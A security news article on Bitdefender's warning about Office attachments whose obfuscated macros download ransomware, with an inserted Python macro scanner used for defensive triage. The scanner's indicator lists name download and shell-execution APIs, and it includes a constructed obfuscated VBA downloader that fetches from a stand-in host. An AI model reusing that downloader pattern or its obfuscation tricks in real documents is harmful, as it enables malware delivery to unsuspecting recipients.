Supposedly clean Office documents download malware

Bitdefender is warning Microsoft Office users about a new spam campaign designed to slip past antispam filters so that the messages land in mailboxes unchallenged. The campaign works because each spam email carries what appears to be a “clean” Microsoft Office document as an attachment.

“For a few days, cybercriminals have been sending targeted e-mails to management departments. The e-mails look like a tax return, a remittance or some kind of bill from a bank and carry a Microsoft Word or Excel attachment,” states Catalin Cosoi, Chief Security Strategist at Bitdefender. “If you’ve recently received an odd tax return or a similar request via email, you may not want to open the file.”

The e-mail isn’t stopped by antispam filters because the attached file itself carries no malicious binary. The trap lies in the macros embedded in the document. Macros are VBA code that Office runs to automate formulas or repetitive tasks, but the same code can create COM objects, spawn processes and call Windows APIs, and so can affect the entire system.

The code in these “clean” documents instructs the victim’s computer to download a piece of malware from a remote server and execute it automatically once the macro runs, with the macro code obfuscated to bypass traditional signature-based antivirus.
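To make the macro behaviour described above concrete, here is an added example of the triage check an analyst would run on extracted VBA source; it is not Bitdefender's code and is not taken from the article. It assumes the macro text has already been pulled out of the .doc or .xls file (in practice with a tool such as olevba from oletools); the two VBA samples, the indicator lists and the names `deobfuscate`, `scan_vba` and `Report` are constructed for this illustration. The scanner first undoes the common string-hiding tricks (Chr() encoding, StrReverse, split literals) and only then looks for an auto-execute entry point combined with a download or execute capability, which is what a signature that matches only the raw text misses.

```python
"""Triage scanner for Office VBA macro source (added example, not Bitdefender's code)."""
import re
from dataclasses import dataclass, field

# Hypothetical indicator sets, constructed for this example:
#   autoexec    - entry points Office runs by itself when a document is opened
#   download    - ways a macro fetches a remote payload
#   execute     - ways a macro launches what it fetched
#   obfuscation - cheap tricks that hide the strings above from a naive signature scan
INDICATORS = {
    "autoexec": re.compile(r"\b(?:AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I),
    "download": re.compile(r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I),
    "execute": re.compile(r"WScript\.Shell|ShellExecute|\bShell\b|\.Run\b", re.I),
    "obfuscation": re.compile(r"\bChr[W$]?\s*\(|\bStrReverse\s*\(", re.I),
}

_CHR = re.compile(r"\bChr[W$]?\s*\(\s*(\d+)\s*\)", re.I)
_STRREV = re.compile(r'\bStrReverse\s*\(\s*"([^"]*)"\s*\)', re.I)
_CONCAT = re.compile(r'"\s*&\s*"')  # closing quote, &, opening quote: "a" & "b"


def _chr_literal(m):
    c = chr(int(m.group(1)))
    return '"' + ('""' if c == '"' else c) + '"'  # VBA doubles quotes inside literals


def deobfuscate(src: str) -> str:
    """Undo Chr(n) encoding, StrReverse("...") and "a" & "b" splitting until stable."""
    prev = None
    while prev != src:
        prev = src
        src = _CHR.sub(_chr_literal, src)
        src = _STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', src)
        src = _CONCAT.sub("", src)
    return src


@dataclass
class Report:
    hits: dict = field(default_factory=dict)  # indicator category -> sorted unique matches
    decoded: str = ""

    @property
    def verdict(self) -> str:
        if "autoexec" in self.hits and ("download" in self.hits or "execute" in self.hits):
            return "downloader-macro"
        return "review" if self.hits else "clean"


def scan_vba(src: str) -> Report:
    decoded = deobfuscate(src)
    hits = {}
    for name, rx in INDICATORS.items():
        # Obfuscation is judged on the raw text; behaviour on the decoded text.
        target = src if name == "obfuscation" else decoded
        found = sorted({m.group(0) for m in rx.finditer(target)})
        if found:
            hits[name] = found
    return Report(hits, decoded)


# Constructed sample: a harmless spreadsheet helper.
BENIGN_VBA = '''
Sub FillTotals()
    Range("B10").Formula = "=SUM(B1:B9)"
End Sub
'''

# Constructed sample of the downloader pattern: every tell-tale keyword is
# split, reversed or character-code encoded; the URL points at a reserved
# .invalid domain and nothing here is a working payload.
MALICIOUS_VBA = r'''
Sub AutoOpen()
    Dim http, sh, url, dst
    url = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://payload.example.invalid/inv.exe"
    dst = "C:\Users\Public\inv.exe"
    Set http = CreateObject("MSXML2" & "." & "XMLHTTP")
    http.Open "GET", url, False
    http.Send
    Set sh = CreateObject(StrReverse("llehS.tpircSW"))
    sh.Run dst
End Sub
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_VBA), ("malicious", MALICIOUS_VBA)):
        rep = scan_vba(src)
        print(f"{label}: {rep.verdict} {rep.hits}")
```

Run stand-alone, the benign sample reports `clean` and the constructed downloader reports `downloader-macro`, with the decoded URL and `WScript.Shell` visible in `Report.decoded` even though neither string appears in the raw macro. The keyword lists are deliberately short; a production scanner would use olevba's much larger tables and also flag suspicious declared Win32 APIs.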

Catalin Cosoi continues, “The malware on the remote server is either ransomware or an industrial espionage tool. Both are as dangerous as they look: the effect of the ransomware is immediate as it can encrypt a company’s important files and ask for a ransom. The espionage tool can be even more vicious, depending on what kind of files it can access.”

Defending against this threat requires security across the company network from end to end; no single control is enough. Office’s own macro security setting is the first check: with macros disabled by default, a document from an unknown sender cannot run its code unless the user explicitly enables it. Beyond that, use an antivirus solution that proactively detects threats, so the danger is blocked before it has the opportunity to issue a command: in this case, before the macro can download the malware.
